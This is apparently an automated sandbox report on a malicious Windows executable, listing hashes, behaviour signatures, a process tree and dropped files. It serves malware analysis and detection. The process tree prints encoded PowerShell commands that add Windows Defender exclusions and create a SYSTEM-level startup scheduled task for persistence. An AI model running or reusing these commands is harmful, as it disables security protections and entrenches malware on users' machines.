Analysis

  • max time kernel
    299s
  • max time network
    303s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64, arch:x86, image:win10-20220901-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    17/09/2022, 10:23

General

  • Target

    af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe

  • Size

    2.5MB

  • MD5

    0119f6316586f89f83c24254c6927dd9

  • SHA1

    eb462b622d6038638889154839238105a17f508b

  • SHA256

    af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e

  • SHA512

    f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653

  • SSDEEP

    49152:35mGlO0aBsajwiCzLaeG862uwnYn9fRLdrAoVMkTEHMUHqyuWoG:0G8/Bspp/p+3rjspTj

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
    "C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3340
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABxAHcAZgBxAHcAZgAuAGUAeABlACIAJwApACAAPAAjAHAAaQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHIAcgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHIAYwB0AHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAHEAdwBmAHEAdwBmACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBuACMAPgA7AA=="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3044
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "qwfqwf"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4108
      • C:\Windows\system32\schtasks.exe
        schtasks /run /tn "qwfqwf"
        3⤵
        PID:4240
    • C:\Program Files\qwfqwf.exe
      "C:\Program Files\qwfqwf.exe"
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Drops file in Program Files directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:4864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:3160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:900
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe "dplckqvqeii"
        2⤵
        PID:8
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe oiwyeszwfgcchj0 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
          2⤵
          • Executes dropped EXE
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:4576

Network

MITRE ATT&CK Enterprise v6

Downloads

      • C:\Program Files\qwfqwf.exe

        Filesize

        2.5MB

        MD5

        0119f6316586f89f83c24254c6927dd9

        SHA1

        eb462b622d6038638889154839238105a17f508b

        SHA256

        af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e

        SHA512

        f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        ad5cd538ca58cb28ede39c108acb5785

        SHA1

        1ae910026f3dbe90ed025e9e96ead2b5399be877

        SHA256

        c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

        SHA512

        c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        edfe53d946955f3d8b879ea0a696c7bc

        SHA1

        636d2a5429b39fcb41dc0b4a977adcb0acfd5522

        SHA256

        3e4fcf3a794d68b42ba9b48162571f7076c65b2edf8a643258a8cc777ad054ea

        SHA512

        1107360413a9c603e12168cef5354e6353ef0645710a510be8fa36b7603b6eaf593bdc278ccc17215c2338f3076540f6228bdd96e2a14068669155d2c9c8293d

      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        811d351aabd7b708fef7683cf5e29e15

        SHA1

        06fd89e5a575f45d411cf4b3a2d277e642e73dbb

        SHA256

        0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

        SHA512

        702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

      • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        302a7c179ef577c237c5418fb770fd27

        SHA1

        343ef00d1357a8d2ff6e1143541a8a29435ed30c

        SHA256

        9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

        SHA512

        f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

      • memory/8-605-0x000001B1BD8A0000-0x000001B1BD8A7000-memory.dmp

        Filesize

        28KB

      • memory/8-602-0x000001B1BDFD0000-0x000001B1BDFD6000-memory.dmp

        Filesize

        24KB

      • memory/900-566-0x000001F0C28D0000-0x000001F0C28EC000-memory.dmp

        Filesize

        112KB

      • memory/2484-120-0x0000000000660000-0x00000000008DA000-memory.dmp

        Filesize

        2.5MB

      • memory/3160-247-0x00000289694A0000-0x00000289694AA000-memory.dmp

        Filesize

        40KB

      • memory/3160-208-0x0000028969480000-0x000002896949C000-memory.dmp

        Filesize

        112KB

      • memory/3160-214-0x0000028969970000-0x0000028969A29000-memory.dmp

        Filesize

        740KB

      • memory/3340-129-0x000002033C520000-0x000002033C596000-memory.dmp

        Filesize

        472KB

      • memory/3340-126-0x0000020324170000-0x0000020324192000-memory.dmp

        Filesize

        136KB

      • memory/4576-609-0x00000000001A0000-0x00000000001C0000-memory.dmp

        Filesize

        128KB

      • memory/4864-597-0x00000000023B0000-0x00000000023BA000-memory.dmp

        Filesize

        40KB

      • memory/4864-606-0x0000000002400000-0x0000000002412000-memory.dmp

        Filesize

        72KB

      • memory/4864-610-0x0000000180000000-0x000000018001D000-memory.dmp

        Filesize

        116KB